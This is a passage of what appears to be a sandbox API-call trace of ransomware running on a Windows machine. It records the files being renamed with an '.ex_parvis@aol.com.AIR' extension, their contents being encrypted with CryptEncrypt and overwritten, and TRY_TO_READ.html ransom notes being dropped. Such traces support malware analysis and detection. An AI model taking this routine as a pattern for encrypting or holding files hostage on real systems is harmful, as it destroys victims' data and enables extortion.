HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0173.028] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\nczihu.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\nczihu.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.031] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\Nczihu.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\nczihu.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0173.031] GetProcessHeap () returned 0x2e0000 [0173.031] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0173.031] GetFileSizeEx (in: hFile=0x618, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7551) returned 1 [0173.031] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1d7f [0173.031] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.031] GetProcessHeap () returned 0x2e0000 [0173.031] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.031] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.031] WriteFile (in: hFile=0x618, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.032] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.032] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x618, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x1d7f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x1d7f, lpOverlapped=0x0) returned 1 [0173.032] SetFilePointer (in: hFile=0x618, lDistanceToMove=-7551, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.032] WriteFile (in: hFile=0x618, lpBuffer=0x3d8198*, nNumberOfBytesToWrite=0x1d7f, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d8198*, lpNumberOfBytesWritten=0x2acf9c8*=0x1d7f, lpOverlapped=0x0) returned 1 [0173.034] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.034] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.034] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg", dwFileAttributes=0x80) returned 1 [0173.034] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg") returned 75 [0173.034] GetProcessHeap () returned 0x2e0000 [0173.034] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0173.034] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg" [0173.034] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0173.035] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\ivefef.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\ivefef.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.037] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\IVefeF.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\ivefef.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0173.037] GetProcessHeap () returned 0x2e0000 [0173.037] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0173.037] GetFileSizeEx (in: hFile=0x618, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7420) returned 1 [0173.037] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1cfc [0173.038] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.038] GetProcessHeap () returned 0x2e0000 [0173.038] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.038] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.038] WriteFile (in: hFile=0x618, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.040] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.040] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x618, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x1cfc, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x1cfc, lpOverlapped=0x0) returned 1 [0173.041] SetFilePointer (in: hFile=0x618, lDistanceToMove=-7420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.041] WriteFile (in: hFile=0x618, lpBuffer=0x3d8118*, nNumberOfBytesToWrite=0x1cfc, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d8118*, lpNumberOfBytesWritten=0x2acf9c8*=0x1cfc, lpOverlapped=0x0) returned 1 [0173.042] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.042] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.042] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi", dwFileAttributes=0x80) returned 1 [0173.042] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi") returned 79 [0173.042] GetProcessHeap () returned 0x2e0000 [0173.042] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x104) returned 0x32f900 [0173.042] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi" [0173.042] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0173.042] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\5pasugxpfy.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\5pasugxpfy.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.045] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MUzt 2daZ\\kENY5x8q3PeFwLI\\5PasugXPFY.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\muzt 2daz\\keny5x8q3pefwli\\5pasugxpfy.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0173.045] GetProcessHeap () returned 0x2e0000 [0173.045] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.045] GetFileSizeEx (in: hFile=0x618, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=64234) returned 1 [0173.045] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xfaea [0173.045] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.046] GetProcessHeap () returned 0x2e0000 [0173.046] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.046] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.046] WriteFile (in: hFile=0x618, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.046] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.047] WriteFile (in: hFile=0x618, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.047] ReadFile (in: hFile=0x618, lpBuffer=0x3110048, nNumberOfBytesToRead=0xfaea, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0xfaea, lpOverlapped=0x0) returned 1 [0173.049] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xb519be10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb519be10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384370 [0173.049] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.049] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.050] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", dwFileAttributes=0x80) returned 1 [0173.051] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 70 [0173.051] GetProcessHeap () returned 0x2e0000 [0173.051] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf2) returned 0x31d01e0 [0173.051] lstrcpyW (in: lpString1=0x31d01e0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" [0173.051] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.12781717671972518758.ex_parvis@aol.com.AIR" [0173.051] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.053] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0173.053] GetProcessHeap () returned 0x2e0000 [0173.053] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0173.053] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=29926) returned 1 [0173.053] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x74e6 [0173.053] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.053] GetProcessHeap () returned 0x2e0000 [0173.053] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.053] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.053] WriteFile (in: hFile=0x61c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.055] WriteFile (in: hFile=0x61c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.055] WriteFile (in: hFile=0x61c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.055] ReadFile (in: hFile=0x61c, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x74e6, lpOverlapped=0x0) returned 1 [0173.056] SetFilePointer (in: hFile=0x61c, lDistanceToMove=-29926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.056] WriteFile (in: hFile=0x61c, lpBuffer=0x3110048*, nNumberOfBytesToWrite=0x74e6, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesWritten=0x2acf9c8*=0x74e6, lpOverlapped=0x0) returned 1 [0173.058] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8086cf0, ftCreationTime.dwHighDateTime=0x1d4c952, ftLastAccessTime.dwLowDateTime=0xb5280650, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb5280650, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3843b0 [0173.058] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\i MW9SRAp\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\i mw9srap\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.063] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\Ybauz8WCCq4cG-T\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\ybauz8wccq4cg-t\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.066] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.066] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.066] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt", dwFileAttributes=0x80) returned 1 [0173.066] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt") returned 92 [0173.066] GetProcessHeap () returned 0x2e0000 [0173.066] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11e) returned 0x32f900 [0173.066] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt" [0173.066] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt.12781717671972518758.ex_parvis@aol.com.AIR" [0173.066] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\_kevfujf6lxjabtu3h.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\_kevfujf6lxjabtu3h.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.069] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\_keVFuJf6LXJABtU3h.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\_kevfujf6lxjabtu3h.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.069] GetProcessHeap () returned 0x2e0000 [0173.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.069] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=32360) returned 1 [0173.069] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7e68 [0173.069] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.069] GetProcessHeap () returned 0x2e0000 [0173.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.069] CryptEncrypt (in: hKey=0x317a48, 